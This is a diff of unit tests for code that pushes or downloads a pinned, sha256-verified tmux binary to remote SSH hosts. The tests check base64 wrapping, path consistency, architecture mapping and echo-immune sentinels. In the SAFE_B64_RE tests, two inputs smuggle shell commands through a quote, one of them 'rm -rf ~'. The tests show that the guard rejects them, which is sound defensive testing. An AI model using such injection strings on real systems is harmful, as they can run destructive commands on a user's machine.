+  // `sh` process piped in via the control line (`base64 -d | sh`) -- proven
+  // empirically in this worktree that a bare `$$`-suffixed literal resolves
+  // to two DIFFERENT pids across that process boundary (the piped `sh`'s own
+  // pid, not the interactive shell's). The fix captures the path ONCE, in
+  // the interactive shell, into an exported variable both sides read --
+  // this test extracts the `>>` target from a chunk line and the `<` source
+  // from the DECODED control script and asserts they are the literal same
+  // shell expression. Mutation to prove this can fail: revert
+  // buildTmuxPushControlScript to read a raw `$HOME/.../.ccc-tmux-push.$$.b64`
+  // literal instead of `"$PUSH_ACCUMULATOR_PATH"` -- the two sides then
+  // diverge (`"$PUSH_ACCUMULATOR_PATH"` vs a literal path containing `$$`)
+  // and this assertion fails. See the implementer's report for the actual
+  // failure output.
+  it('the chunk-write target and the control script\'s read source are the exact same shell expression', () => {
+    const lines = buildTmuxPushLines({ arch: 'linux-x86_64', tarGzBase64: fakeTarGzBase64(), nonce: NONCE })
+    const chunkLine = lines.find((l) => /^echo '[A-Za-z0-9+\/=]*' >> /.test(l))
+    expect(chunkLine).toBeDefined()
+    const writeTarget = chunkLine!.match(/>> (.+)$/)?.[1]
+    expect(writeTarget).toBeDefined()
+
+    const control = decodeControlLine(lines)
+    const readSource = control.match(/base64 -d < (\S+) >/)?.[1]
+    expect(readSource).toBeDefined()
+
+    expect(readSource).toBe(writeTarget)
+    // And it must not be a literal containing `$$` -- a bare `$$`-suffixed
+    // path is exactly the shape that resolves to two different pids across
+    // the interactive-shell / piped-sh process boundary (the bug this test
+    // guards against). It must be a variable reference the interactive
+    // shell set ONCE and exported.
+    expect(writeTarget).not.toMatch(/\$\$/)
+    expect(readSource).not.toMatch(/\$\$/)
+  })
+
+  // Companion assertion: the exported-variable capture line must actually
+  // exist, must be the one place `$$` is evaluated for the accumulator path,
+  // and must run BEFORE the first chunk line (so the variable exists by the
+  // time the interactive shell needs it).
+  it('captures the accumulator path once (with $$) into an exported variable, before any chunk line', () => {
+    const lines = buildTmuxPushLines({ arch: 'linux-x86_64', tarGzBase64: fakeTarGzBase64(), nonce: NONCE })
+    const captureIdx = lines.findIndex((l) => /^\w+=\$HOME\/.*\$\$.*; export \w+$/.test(l))
+    expect(captureIdx).toBeGreaterThan(-1)
+    const firstChunkIdx = lines.findIndex((l) => /^echo '[A-Za-z0-9+\/=]*' >> /.test(l))
+    expect(firstChunkIdx).toBeGreaterThan(captureIdx)
+  })
+})
+
+describe('SAFE_B64_RE / non-base64 payload rejection (#242 round-2 MAJOR fix)', () => {
+  it('accepts real base64 alphabet + padding', () => {
+    expect(SAFE_B64_RE.test('AAAA')).toBe(true)
+    expect(SAFE_B64_RE.test('YQ==')).toBe(true)
+    expect(SAFE_B64_RE.test('')).toBe(true)
+    expect(SAFE_B64_RE.test(fakeTarGzBase64())).toBe(true)
+  })
+
+  it('rejects a payload containing a single quote', () => {
+    expect(SAFE_B64_RE.test("AAAA'; rm -rf ~ #")).toBe(false)
+  })
+
+  // The actual injection boundary: buildTmuxPushLines interpolates
+  // tarGzBase64 into single-quoted remote shell text (`echo '<chunk>' >>
+  // ...`). A `'` in the input closes that quote early. Mutation to prove
+  // this can fail: delete the `SAFE_B64_RE.test(...)` guard at the top of
+  // buildTmuxPushLines -- this test then fails because the throw never
+  // happens and the malicious payload is emitted verbatim.
+  it('buildTmuxPushLines throws rather than emit a payload containing a single quote', () => {
+    expect(() =>
+      buildTmuxPushLines({ arch: 'linux-x86_64', tarGzBase64: "AAAA'; touch $HOME/pwned; echo '", nonce: NONCE }),
+    ).toThrow()
+  })
+
+  it('buildTmuxPushLines does not throw on a genuine base64 payload', () => {
+    expect(() => buildTmuxPushLines({ arch: 'linux-x86_64', tarGzBase64: fakeTarGzBase64(), nonce: NONCE })).not.toThrow()
+  })
+})
+
+describe('buildTmuxPushCommand (wire form fed through runChunkedWrite)', () => {
+  it('joins every line with a trailing \\r, matching how pty-manager writes other PTY commands', () => {
+    const input = { arch: 'linux-x86_64' as const, tarGzBase64: fakeTarGzBase64(10), nonce: NONCE }
+    const lines = buildTmuxPushLines(input)
+    expect(buildTmuxPushCommand(input)).toBe(lines.map((l) => `${l}\r`).join(''))
+  })
+
+  it('never contains the sentinel prefix or any fail=/ok literal in plaintext, at full scale', () => {
+    const wire = buildTmuxPushCommand({ arch: 'macos-arm64', tarGzBase64: fakeTarGzBase64(), nonce: NONCE })
+    expect(wire).not.toContain(TMUX_STAGE_SENTINEL_PREFIX)
+    expect(wire).not.toContain('fail=digest')
+    expect(wire).not.toContain('fail=extract')
+    expect(wire).not.toContain('ok path=')
+  })
+
+  it('is deterministic and reproduces the archive bytes when every chunk line is decoded and concatenated', () => {
+    const b64 = fakeTarGzBase64(98765)
+    const wire = buildTmuxPushCommand({ arch: 'linux-arm64', tarGzBase64: b64, nonce: NONCE })
+    // Chunk lines write to the exported accumulator variable ("$VAR"), not a
+    // literal $HOME/...-suffixed path -- see PUSH_ACCUMULATOR_VAR's doc
+    // comment in ssh-tmux-push.ts (#242 round-2 BLOCKER fix: a literal
+    // $$-suffixed path here would resolve to a DIFFERENT pid than the one
+    // the control script's piped `sh` reads).
+    const reassembled = [...wire.matchAll(/echo '([A-Za-z0-9+\/=]*)' >> "\$\w+"/g)]
+      .map((m) => m[1])
+      .join('')
+    expect(reassembled).toBe(b64)
+  })
+})
+
+describe('mapUnameToTarget / buildArchProbeCommand / parseArchProbeSentinel', () => {
+  it('maps all four uname combos ssh-tmux-stage.ts recognizes, and rejects anything else', () => {
+    expect(mapUnameToTarget('Linux-x86_64')).toBe('linux-x86_64')
+    expect(mapUnameToTarget('Linux-aarch64')).toBe('linux-arm64')
+    expect(mapUnameToTarget('Linux-arm64')).toBe('linux-arm64')
+    expect(mapUnameToTarget('Darwin-x86_64')).toBe('macos-x86_64')
+    expect(mapUnameToTarget('Darwin-arm64')).toBe('macos-arm64')
+    expect(mapUnameToTarget('SunOS-sparc64')).toBeNull()
+    expect(mapUnameToTarget('')).toBeNull()
+  })
+
+  it('parses a real (post-execution) probe reply into the right target', () => {
+    expect(parseArchProbeSentinel(`${ARCH_PROBE_SENTINEL_PREFIX} Linux-x86_64\r\n`)).toBe('linux-x86_64')
+  })
+
+  it('returns undefined (not a false match) for a chunk-truncated reply', () => {
+    expect(parseArchProbeSentinel(`${ARCH_PROBE_SENTINEL_PREFIX} Linux-x86`)).toBeUndefined()
+  })
+
+  it('returns undefined when the sentinel is absent from this chunk', () => {
+    expect(parseArchProbeSentinel('some unrelated PTY output\r\n')).toBeUndefined()
+  })
+
+  // The actual echo-immunity property buildArchProbeCommand's doc comment
+  // argues for: the UNEXPANDED, as-typed command text (what a terminal
+  // echoes back WHILE the line is being entered, before the shell has run
+  // anything) must never itself satisfy parseArchProbeSentinel — mirrors the
+  // "echo immunity" regression block in pty-manager-ssh-tmux.test.ts for
+  // tier 3, but exercised directly here since this probe is deliberately
+  // plaintext rather than base64-wrapped.
+  it('the command\'s own pre-execution (as-typed) text never satisfies its own parser', () => {
+    const typed = buildArchProbeCommand()
+    // Simulate the terminal echoing the line back exactly as typed, followed
+    // by the real \r\n from pressing Enter to submit it.
+    expect(parseArchProbeSentinel(`${typed}\r\n`)).toBeUndefined()
+  })
+
+  it('is deterministic and contains no chunk-of-a-real-archive-shaped text', () => {
+    expect(buildArchProbeCommand()).toBe(buildArchProbeCommand())
+    expect(buildArchProbeCommand()).toContain('uname -s')
+    expect(buildArchProbeCommand()).toContain('uname -m')
+  })
+})
+
+// #242 round-3 MINOR fix: the raw probe (buildArchProbeCommand) is
+// plaintext, so both the outgoing command and its reply were visible in the
+// user's pane -- unlike everything else tier 3/4 writes. Mutation to prove
+// this can fail: revert buildArchProbeCommandBracketed to `return
+// buildArchProbeCommand()` (no bracket) -- the first assertion below then
+// fails because the line no longer starts with 'stty -echo'.
+describe('buildArchProbeCommandBracketed (#242 round-3 MINOR fix)', () => {
+  it('brackets the raw probe in stty -echo / stty echo', () => {
+    const bracketed = buildArchProbeCommandBracketed()
+    expect(bracketed).toBe(`stty -echo 2>/dev/null; ${buildArchProbeCommand()}; stty echo 2>/dev/null`)
+    expect(bracketed.startsWith('stty -echo')).toBe(true)
+    expect(bracketed.endsWith('stty echo 2>/dev/null')).toBe(true)
+  })
+
+  it('does not collide with the base64 -d | sh substring pty-manager tests use to identify the tier-3 staging write', () => {
+    expect(buildArchProbeCommandBracketed()).not.toContain('base64 -d | sh')
+  })
+
+  it('the bracketed command\'s own pre-execution (as-typed) text still never satisfies its own parser', () => {
+    const typed = buildArchProbeCommandBracketed()
+    expect(parseArchProbeSentinel(`${typed}\r\n`)).toBeUndefined()
+  })
+})
+
+// #242 round-3 MINOR fix: mapUnameToTarget (host-side, callable TS) and
+// buildTmuxStageScript's `case "$_u-$_m" in ... esac` block (remote shell
+// text) must recognise the EXACT same set of uname combos -- the item's own
+// doc comment claimed they already did, with no test tying them together, so
+// a combo added to either side alone could silently drift from the other.
+// This parses the real remote script text back out (not a re-derivation of
+// either table's logic) and cross-checks both directions.
+describe('mapUnameToTarget stays in lockstep with buildTmuxStageScript\'s case table (#242 round-3 MINOR fix)', () => {
+  const SFX_TO_TARGET: Record<string, TmuxStageTarget> = {
+    'linux-x86_64': 'linux-x86_64',
+    'linux-arm64': 'linux-arm64',
+    'macos-x86_64': 'macos-x86_64',
+    'macos-arm64': 'macos-arm64',
+  }
+
+  /** Parse the `case "$_u-$_m" in ... esac` block out of the REAL remote
+   *  script text and return every combo it recognises, mapped to the target
+   *  its clause assigns. The wildcard `*) _sfx="";;` clause (the
+   *  "unrecognised" case) is intentionally excluded -- it has no target. */
+  function extractShellCombos(): Record<string, TmuxStageTarget> {
+    const script = buildTmuxStageScript(NONCE)
+    const caseBlock = script.match(/case "\$_u-\$_m" in ([\s\S]*?) esac/)
+    expect(caseBlock).not.toBeNull()
+    const body = caseBlock![1]
+    const out: Record<string, TmuxStageTarget> = {}
+    const clauseRe = /([^)]+)\) _sfx=(\S+?);;/g
+    let m: RegExpExecArray | null
+    while ((m = clauseRe.exec(body))) {
+      const combos = m[1].trim()
+      const sfx = m[2]
+      if (combos === '*') continue // the unrecognised-combo fallthrough, not a real target
+      const target = SFX_TO_TARGET[sfx]
+      expect(target).toBeDefined() // an _sfx this test doesn't know means SFX_TO_TARGET itself is stale
+      for (const combo of combos.split('|')) out[combo.trim()] = target
+    }
+    return out
+  }
+
+  /** Extract every `case '<combo>':` label straight out of
+   *  mapUnameToTarget's OWN (transpiled) source via Function#toString --
+   *  deliberately NOT a second hand-typed list of "the combos it currently
+   *  accepts", which would just be a THIRD copy of the same table with the
+   *  same drift risk as the two this test exists to tie together. A combo
+   *  added to the switch is discovered here automatically. */
+  function extractMapUnameCombos(): string[] {
+    const src = mapUnameToTarget.toString()
+    return [...src.matchAll(/case\s+['"]([^'"]+)['"]\s*:/g)].map((m) => m[1])
+  }
+
+  // Mutation to prove this can fail: add a fifth combo (e.g.
+  // `Linux-riscv64`) to ONLY buildTmuxStageScript's case block -- extractShellCombos
+  // then reports a combo mapUnameToTarget's switch has no case for, and
+  // `mapUnameToTarget(combo)` returns `null` instead of the expected target.
+  it('every combo the shell case table recognises maps to the SAME target via mapUnameToTarget', () => {
+    const shellCombos = extractShellCombos()
+    expect(Object.keys(shellCombos).length).toBeGreaterThan(0)
+    for (const [combo, target] of Object.entries(shellCombos)) {
+      expect(mapUnameToTarget(combo)).toBe(target)
+    }
+  })
+
+  // Mutation to prove this can fail: add a case to ONLY mapUnameToTarget's
+  // switch (e.g. `case 'SunOS-sparc64': return 'linux-x86_64'`), leaving the
+  // shell table untouched -- extractMapUnameCombos then reports a combo
+  // extractShellCombos never produced, so `shellCombos[combo]` is undefined
+  // and the first assertion below fails (independently of whichever
+  // pre-existing test also happens to notice the new combo).
+  it('mapUnameToTarget recognises nothing the shell table does not', () => {
+    const shellCombos = extractShellCombos()
+    const tsCombos = extractMapUnameCombos()
+    expect(tsCombos.length).toBeGreaterThan(0)
+    for (const combo of tsCombos) {
+      expect(shellCombos[combo]).toBeDefined()
+    }
+    // And the two sets are the SAME SIZE -- catches a combo added to the
+    // shell table without ALSO adding the matching case (the previous test
+    // already catches that via a wrong-target/null mismatch, but a size
+    // check here is a second, independent tripwire on the exact same drift).
+    expect(tsCombos.length).toBe(Object.keys(shellCombos).length)
+  })
+})
+
+// #242 finding F6 (adversarial review round 4, MINOR): the release-asset URL
+// was hand-built TWICE -- once as remote shell text in buildTmuxStageScript
+// (this module's `_url="..."` line) and again as a TS template literal in
+// pty-manager.ts's downloadAndCacheTmuxArchive -- with no shared constant and
+// no test tying them together. Both now build from the SAME
+// TMUX_ASSET_FILENAME_PREFIX/SUFFIX + tmuxReleaseBaseUrl() parts (only the
+// arch differs: a shell variable on the remote, a TS string on the host).
+// This parses the real remote script's `_url=` assignment back out (not a
+// re-derivation of either side's logic) and cross-checks it against
+// tmuxStageAssetUrl(arch) for every recognised arch.
+describe('tmuxStageAssetUrl stays in lockstep with the remote script\'s curl/wget URL (#242 finding F6)', () => {
+  /** Pull the `_url="..."` template straight out of the REAL remote script
+   *  text -- `$_sfx` is the shell variable the remote substitutes with the
+   *  arch suffix at runtime; substituting it with a literal arch string here
+   *  is the host-side equivalent of that shell expansion. */
+  function extractRemoteUrlTemplate(): string {
+    const script = buildTmuxStageScript(NONCE)
+    const m = script.match(/_url="([^"]+)";/)
+    expect(m).not.toBeNull()
+    return m![1]
+  }
+
+  // Mutation to prove this can fail: change ONLY pty-manager.ts's
+  // downloadAndCacheTmuxArchive (or ssh-tmux-stage.ts's buildTmuxStageScript)
+  // to hand-build a differently-shaped URL again (e.g. a different owner/repo
+  // or filename template) instead of sharing tmuxReleaseBaseUrl()/
+  // TMUX_ASSET_FILENAME_PREFIX/SUFFIX -- the two sides drift and this
+  // assertion fails for every arch.
+  it('the remote script curls the exact URL tmuxStageAssetUrl(arch) builds host-side, for every recognised arch', () => {
+    const template = extractRemoteUrlTemplate()
+    for (const arch of ARCHES) {
+      const remoteUrl = template.replace('$_sfx', arch)
+      expect(remoteUrl).toBe(tmuxStageAssetUrl(arch))
+    }
+  })
+
+  it('resolves to a well-formed https URL under the tmux-builds release path', () => {
+    for (const arch of ARCHES) {
+      const url = tmuxStageAssetUrl(arch)
+      expect(url).toMatch(/^https:\/\/github\.com\/tmux\/tmux-builds\/releases\/download\/v[0-9A-Za-z.]+\/tmux-[0-9A-Za-z.]+-.+\.tar\.gz$/)
+    }
+  })
+})

--- a/tests/unit/ssh-tmux-stage.test.ts
+++ b/tests/unit/ssh-tmux-stage.test.ts
@@ -1,0 +1,305 @@
+// tests/unit/ssh-tmux-stage.test.ts
+//
+// #242 tier 3: staging tmux on the remote via curl/wget + a pinned,
+// sha256-verified upstream static build. buildTmuxStageCommand(NONCE) is a pure
+// string builder (mirrors ssh-tmux.test.ts) so every gate in the emitted
+// POSIX fragment is asserted directly on its text, without spinning up a
+// PTY. Each assertion below was verified to actually FAIL against a
+// deliberately broken version of the builder before being kept (see the
+// implementer's report for the exact mutation + failure output).
+import { describe, it, expect } from 'vitest'
+import { buildTmuxStageScript, buildTmuxStageCommand, TMUX_STAGE_TAG, TMUX_STAGE_SHA256, TMUX_STAGE_SENTINEL_PREFIX, assertSafeNonce } from '../../src/main/ssh-tmux-stage'
+
+// #242 finding F1 (b): every buildTmuxStageScript/buildTmuxStageCommand call
+// below now requires a nonce -- a fixed test value stands in for the real
+// per-session randomId() pty-manager.ts generates.
+const NONCE = 'testnonce123abc'
+// NOTE: this module deliberately does NOT import pty-manager (its own doc
+// comment: "unit-testable without the pty-manager dependency graph" --
+// pty-manager pulls in node-pty, which is not safe to import unmocked under
+// plain vitest/node). The echo-immunity regression that feeds
+// buildTmuxStageCommand(NONCE)'s output into the REAL parseTmuxStageSentinel
+// lives in pty-manager-ssh-tmux.test.ts instead, which already mocks
+// node-pty/electron for exactly this reason.
+
+// buildTmuxStageScript(NONCE) is the raw, readable POSIX fragment -- every
+// structural gate below (sha256 check, version pin, terminfo probe, etc.)
+// is asserted against ITS text. buildTmuxStageCommand(NONCE) is the wire form
+// pty-manager actually writes to the PTY (base64-wrapped -- see the
+// dedicated describe block near the bottom of this file); it is
+// deliberately NOT what these structural tests exercise, since after the
+// #242 round-3 MAJOR fix its text is opaque base64, not readable shell.
+describe('buildTmuxStageScript', () => {
+  it('detects arch/os via uname -s / uname -m', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toContain('uname -s')
+    expect(cmd).toContain('uname -m')
+  })
+
+  it('maps all four tmux-builds targets off the uname result', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toMatch(/Linux-x86_64\)\s*_sfx=linux-x86_64/)
+    expect(cmd).toMatch(/Linux-(aarch64\|Linux-arm64|arm64)\)\s*_sfx=linux-arm64/)
+    expect(cmd).toMatch(/Darwin-x86_64\)\s*_sfx=macos-x86_64/)
+    expect(cmd).toMatch(/Darwin-arm64\)\s*_sfx=macos-arm64/)
+  })
+
+  it('emits fail=arch when the uname combo matches none of the four targets', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toMatch(/_sfx=""[\s\S]*fail=arch/)
+  })
+
+  it('downloads with curl -fsSL, falling back to wget -qO-, into a temp file', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toMatch(/curl -fsSL "\$_url" -o "\$_tmp"/)
+    expect(cmd).toMatch(/wget -qO- "\$_url" > "\$_tmp"/)
+    // The two are chained with || so wget only runs if curl failed.
+    expect(cmd).toMatch(/curl -fsSL[^|]*\|\|\s*wget -qO-/)
+    expect(cmd).toMatch(/_tmp=\$\(mktemp/)
+  })
+
+  // Adversarial review round 2, MINOR: a predictable /tmp path fallback on
+  // a host without `mktemp` lets a co-tenant pre-plant a symlink at that
+  // exact path, which curl/wget then follow. The fallback must land inside
+  // $HOME/.claude/bin (a directory only this user can write to), never a
+  // world-writable /tmp guess.
+  it('falls back to a path inside $HOME/.claude/bin, never a predictable /tmp path, when mktemp is unavailable', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).not.toMatch(/\/tmp\/ccc-tmux-stage/)
+    expect(cmd).toMatch(/mktemp 2>\/dev\/null \|\| \{[^}]*\$HOME\/\.claude\/bin\/\.ccc-tmux-stage\.\$\$/)
+  })
+
+  it('treats an empty/missing download as a distinct failure, not a digest failure', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toMatch(/if \[ ! -s "\$_tmp" \][\s\S]*?fail=download/)
+  })
+
+  // Acceptance (a): the sha256 verification step must actually gate
+  // installation. Removing it (installing straight off the download) must
+  // fail this test.
+  it('verifies the download against the embedded sha256 before installing, with a shasum -a 256 fallback', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toContain('sha256sum -c')
+    expect(cmd).toContain('shasum -a 256 -c')
+    // Structural gate, not just presence: the digest check must appear
+    // BEFORE the chmod/install step in program order, and the chmod must
+    // sit inside the digest-ok branch (guarded by $_dgok), not run
+    // unconditionally after a bare download.
+    const dgIdx = cmd.indexOf('sha256sum -c')
+    const dgOkIdx = cmd.indexOf('"$_dgok" != "0"')
+    const chmodIdx = cmd.indexOf('chmod 755')
+    expect(dgIdx).toBeGreaterThan(-1)
+    expect(dgOkIdx).toBeGreaterThan(dgIdx)
+    expect(chmodIdx).toBeGreaterThan(dgOkIdx)
+  })
+
+  it('embeds a distinct sha256 constant per architecture, all 64 hex chars', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    const values = Object.values(TMUX_STAGE_SHA256)
+    expect(values).toHaveLength(4)
+    const unique = new Set(values)
+    expect(unique.size).toBe(4)
+    for (const sha of values) {
+      expect(sha).toMatch(/^[0-9a-f]{64}$/)
+      expect(cmd).toContain(sha)
+    }
+  })
+
+  it('removes the temp file and installs nothing on a digest mismatch', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toMatch(/"\$_dgok" != "0" \]; then rm -f "\$_tmp"; echo "[^"]*fail=digest"/)
+  })
+
+  // Acceptance (b): the release URL must carry the exact pinned tag, not a
+  // floating alias -- a `latest` URL must fail this test.
+  it('pins the download URL to the exact v3.7b tag, not a floating alias', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(TMUX_STAGE_TAG).toBe('v3.7b')
+    expect(cmd).toContain('/tmux-builds/releases/download/v3.7b/tmux-3.7b-')
+    expect(cmd).not.toContain('/latest/')
+    expect(cmd).not.toMatch(/\blatest\b/)
+  })
+
+  it('installs the verified binary to ~/.claude/bin/tmux at mode 755', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    // Round-2 fix: tar extracts to a SIBLING temp file, not straight at the
+    // final install path (see the never-truncates-live-path test below) --
+    // chmod 755 applies to that sibling, and only a successful `mv -f`
+    // afterward puts the verified, executable file at the real path.
+    expect(cmd).toMatch(/tar -xzf "\$_tmp" -O tmux > "\$_dst" 2>\/dev\/null/)
+    expect(cmd).toContain('chmod 755 "$_dst"')
+    expect(cmd).toMatch(/mv -f "\$_dst" "\$HOME\/\.claude\/bin\/tmux"/)
+  })
+
+  // Adversarial review round 2, MAJOR: the previous shape
+  // (`tar ... -O tmux > "$HOME/.claude/bin/tmux"`) truncates the install
+  // path the instant the redirect opens, before tar has extracted anything
+  // -- a failed extract (or a second, concurrent staging session on the
+  // same host) could leave a 0-byte or corrupted file at the live path.
+  // Fails if tar's stdout is ever redirected straight at the final path.
+  it('never redirects tar output directly at the final install path', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).not.toMatch(/-O tmux > "\$HOME\/\.claude\/bin\/tmux"/)
+  })
+
+  // Extract failure must remove only the sibling temp (and the downloaded
+  // archive), never touch whatever was already at the install path.
+  it('removes only the sibling temp file on extract failure, not the install path', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toMatch(/rm -f "\$_dst" "\$_tmp"; echo "[^"]*fail=extract"/)
+  })
+
+  // Acceptance (c): dropping the smoke test (or the detached new-session
+  // probe specifically) must fail this test.
+  it('smoke-tests the installed binary with -V plus a detached new-session -d ... true', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toMatch(/"\$HOME\/\.claude\/bin\/tmux" -V >\/dev\/null 2>&1/)
+    expect(cmd).toMatch(/new-session\s+-d\s+-s\s+"\$_smoke"\s+true/)
+  })
+
+  // Adversarial review round 2, BLOCKER: a chmod-755 tmux left in place at
+  // the exact tier-2 probe path after a failed smoke test gets picked up
+  // (X_OK-only probe, no run) by every LATER session to the same host,
+  // which then wraps claude in it and never launches claude again. The
+  // fail=terminfo branch must remove/de-executable the install path -- this
+  // is the INVERSE of the old assertion (which locked the defect in by
+  // asserting the branch must NOT call rm).
+  it('emits a distinct fail=terminfo sentinel on smoke failure and removes the just-installed binary', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=terminfo`)
+    const terminfoBranch = cmd.slice(cmd.indexOf('new-session'), cmd.indexOf('fail=terminfo') + 'fail=terminfo'.length)
+    expect(terminfoBranch).toMatch(/rm -f "\$HOME\/\.claude\/bin\/tmux"/)
+  })
+
+  it('reports an absolute shell-expanded path on success, never a literal tilde', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} ok path=$HOME/.claude/bin/tmux`)
+    expect(cmd).not.toMatch(/path=~/)
+  })
+
+  // #242 finding F1 (b): every sentinel this script can emit -- ok AND every
+  // fail=* variant -- must carry the nonce. Mutation to prove this can fail:
+  // drop `${nonce}` from any one of the six echo lines in
+  // buildTmuxStageScript -- that specific assertion below fails while the
+  // others (built off a DIFFERENT literal) stay green, proving each is
+  // independently load-bearing rather than one shared false-positive.
+  it('embeds the nonce in every sentinel literal this script can emit', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    expect(cmd).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=arch`)
+    expect(cmd).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=download`)
+    expect(cmd).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=digest`)
+    expect(cmd).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=extract`)
+    expect(cmd).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=terminfo`)
+    expect(cmd).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} ok path=$HOME/.claude/bin/tmux`)
+  })
+
+  it('is syntactically balanced: equal if/fi and case/esac counts', () => {
+    const cmd = buildTmuxStageScript(NONCE)
+    const count = (re: RegExp) => (cmd.match(re) ?? []).length
+    expect(count(/\bif\b/g)).toBe(count(/\bfi\b/g))
+    expect(count(/\bcase\b/g)).toBe(count(/\besac\b/g))
+  })
+
+  it('returns a deterministic, side-effect-free single-line fragment', () => {
+    const a = buildTmuxStageScript(NONCE)
+    const b = buildTmuxStageScript(NONCE)
+    expect(a).toBe(b)
+    expect(a).not.toContain('\n')
+  })
+})
+
+// M5 (adversarial review round 5): assertSafeTmuxStageConstants had ZERO
+// tests, and writeTmuxStageCmd's call-site comment in pty-manager.ts claimed
+// buildTmuxStageCommand "cannot throw" -- contradicting the guard's own doc
+// comment and its throw sites. These prove the throw is real AND that the
+// call site (verified separately in pty-manager-ssh-tmux.test.ts) degrades
+// to the bare launch rather than propagating it.
+describe('assertSafeTmuxStageConstants guard (M5)', () => {
+  it('throws when the nonce fails the [A-Za-z0-9]+ charset guard', () => {
+    expect(() => buildTmuxStageScript('has a space')).toThrow(/nonce/i)
+    expect(() => buildTmuxStageScript('has;metachar')).toThrow(/nonce/i)
+    expect(() => buildTmuxStageScript('')).toThrow()
+  })
+
+  // Mutation to prove this can fail: comment out the
+  // `for (const [arch, sha] of ...)` loop inside assertSafeTmuxStageConstants
+  // -- this test then throws NOTHING (buildTmuxStageScript happily embeds
+  // the corrupted digest into the emitted fragment) and the assertion below
+  // fails. TMUX_STAGE_SHA256 is declared `const` but is a plain object --
+  // `const` only freezes the BINDING, not its contents -- so mutating one
+  // entry and restoring it afterward is a legitimate way to exercise the
+  // guard against a real corrupted-constant shape without touching the
+  // module's source.
+  it('throws when a TMUX_STAGE_SHA256 entry is corrupted to a non-hex/wrong-length value', () => {
+    const original = TMUX_STAGE_SHA256['linux-x86_64']
+    TMUX_STAGE_SHA256['linux-x86_64'] = 'not-a-real-digest'
+    try {
+      expect(() => buildTmuxStageScript(NONCE)).toThrow(/sha256/i)
+    } finally {
+      TMUX_STAGE_SHA256['linux-x86_64'] = original
+    }
+    // Restored: the guard no longer fires, proving the throw was caused by
+    // the mutation and not some other, unrelated failure.
+    expect(() => buildTmuxStageScript(NONCE)).not.toThrow()
+  })
+
+  it('assertSafeNonce is the same guard buildTmuxStageScript uses internally', () => {
+    expect(() => assertSafeNonce(NONCE)).not.toThrow()
+    expect(() => assertSafeNonce('bad nonce')).toThrow()
+  })
+})
+
+// #242 round-3 adversarial review, MAJOR: buildTmuxStageScript's sentinel
+// literals must never reach the PTY in plaintext, because the remote tty
+// echoes back whatever line is typed BEFORE the shell has run a single byte
+// of it -- and that echo can satisfy parseTmuxStageSentinel's own regex,
+// latching `stagingDone` and firing writeClaudeCmd() while curl is still
+// mid-download (see pty-manager-ssh-tmux.test.ts for the call-site half of
+// this fix). buildTmuxStageCommand(NONCE) is the wire form pty-manager actually
+// writes; these tests cover it directly.
+describe('buildTmuxStageCommand (wire form written to the PTY)', () => {
+  it('never contains the sentinel prefix or any fail=/ok literal in plaintext', () => {
+    const wire = buildTmuxStageCommand(NONCE)
+    // Mutation to prove this can fail: skip the base64 wrap and return
+    // buildTmuxStageScript(NONCE) directly -- every one of these assertions then
+    // fails, because the raw script contains the prefix and every fail=/ok
+    // literal verbatim (see the implementer's report for the actual run).
+    expect(wire).not.toContain(TMUX_STAGE_SENTINEL_PREFIX)
+    expect(wire).not.toContain('fail=arch')
+    expect(wire).not.toContain('fail=download')
+    expect(wire).not.toContain('fail=digest')
+    expect(wire).not.toContain('fail=extract')
+    expect(wire).not.toContain('fail=terminfo')
+    expect(wire).not.toContain('ok path=')
+    // Nor the readable script internals a co-tenant reading over-the-shoulder
+    // (or a terminal-scrollback grep) could otherwise recover pre-execution.
+    expect(wire).not.toContain('uname -s')
+    expect(wire).not.toContain('sha256sum')
+    expect(wire).not.toContain(TMUX_STAGE_TAG)
+  })
+
+  it('wraps the base64 payload in an stty -echo / stty echo bracket', () => {
+    const wire = buildTmuxStageCommand(NONCE)
+    expect(wire).toMatch(/^stty -echo 2>\/dev\/null; echo '[A-Za-z0-9+\/=]+' \| base64 -d \| sh; stty echo 2>\/dev\/null$/)
+  })
+
+  it('base64-decodes back to EXACTLY buildTmuxStageScript(NONCE), byte for byte', () => {
+    const wire = buildTmuxStageCommand(NONCE)
+    const m = wire.match(/echo '([A-Za-z0-9+\/=]+)' \| base64 -d/)
+    expect(m).not.toBeNull()
+    const decoded = Buffer.from(m![1], 'base64').toString('utf8')
+    expect(decoded).toBe(buildTmuxStageScript(NONCE))
+  })
+
+  it('is deterministic and single-line, same as the script it wraps', () => {
+    const a = buildTmuxStageCommand(NONCE)
+    const b = buildTmuxStageCommand(NONCE)
+    expect(a).toBe(b)
+    expect(a).not.toContain('\n')
+  })
+
+  // The column-wrapped-echo regression against the REAL parseTmuxStageSentinel
+  // lives in pty-manager-ssh-tmux.test.ts (see "echo immunity" describe block
+  // there) — it needs pty-manager's mocked node-pty/electron environment,
+  // which this file intentionally does not pull in.
+})

--- a/tests/unit/ssh-tmux.test.ts
